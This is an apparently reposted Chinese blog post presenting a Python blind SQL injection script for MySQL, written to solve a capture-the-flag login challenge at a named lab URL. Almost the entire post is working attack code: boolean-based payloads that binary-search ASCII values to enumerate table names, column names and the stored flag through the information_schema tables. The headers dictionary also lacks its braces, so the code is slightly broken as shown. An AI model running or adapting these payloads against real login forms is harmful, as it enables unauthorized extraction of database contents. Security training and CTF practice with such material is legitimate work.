SQL盲注脚本(MySQL)
Posted rongyongfeikai2
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL盲注脚本(MySQL)相关的知识,希望对你有一定的参考价值。
#coding:utf-8
import urllib.request
import json
"""
SQL盲注脚本,适用于mysql数据库;CTF 0~1 SQL注入第二题
"""
class SqlBlindInjection(object):
def __init__(self):
self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php"
#条件为真的返回值
self.TRUERTN = u"\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef"
#条件为假时的返回值
self.FALSERTN = u"\\u8d26\\u53f7\\u4e0d\\u5b58\\u5728"
#猜测位数
self.GUESSNUM = 128
#头部
self.headers = 'Accept-Charset': 'utf-8', 'Content-Type': 'application/x-www-form-urlencoded'
def post(self, url, data):
"""
发送post请求
True:条件为真
False:条件为假
"""
req = urllib.request.Request(url=url, data=data.encode(), headers=self.headers, method='POST')
response = urllib.request.urlopen(req).read()
try:
json_rtn = json.loads(response)
if json_rtn["msg"] == self.TRUERTN:
return True
elif json_rtn["msg"] == self.FALSERTN:
return False
except Exception as e:
return self.post(url, data)
def binary_search(self, url, data):
"""
二分查找猜测
"""
rtn = ""
for i in range(1, self.GUESSNUM):
#ascii可打印字符32~127
start = 32
end = 128
mid = (start+end)//2
while start < end:
cdata = data%(i,mid,)
if self.post(self.url, cdata):
start = mid + 1
else:
end = mid
mid = (start+end)//2
if mid == 32:
break
rtn += chr(mid)
print(rtn)
return rtn
def guess_table(self):
"""
猜测表名
"""
data = "name=admin' and if(ascii(mid((Select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)#&pass=1"
table_name = self.binary_search(self.url, data)
print(table_name)
def guess_cols(self):
"""
猜测列名
"""
data = "name=admin' and if(ascii(mid((Select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),%d,1))>%d,1,0)#&pass=1"
col_name = self.binary_search(self.url, data)
print(col_name)
def get_flag(self):
"""
获得flag
"""
data = "name=admin' and if(ascii(mid((Select flag from fl4g),%d,1))>%d,1,0)#&pass=1"
flag = self.binary_search(self.url, data)
print(flag)
if __name__ == '__main__':
sql_blind_inection = SqlBlindInjection()
#fl4g
#sql_blind_inection.guess_table()
#flag
#sql_blind_inection.guess_cols()
print(sql_blind_inection.get_flag())
以上是关于SQL盲注脚本(MySQL)的主要内容,如果未能解决你的问题,请参考以下文章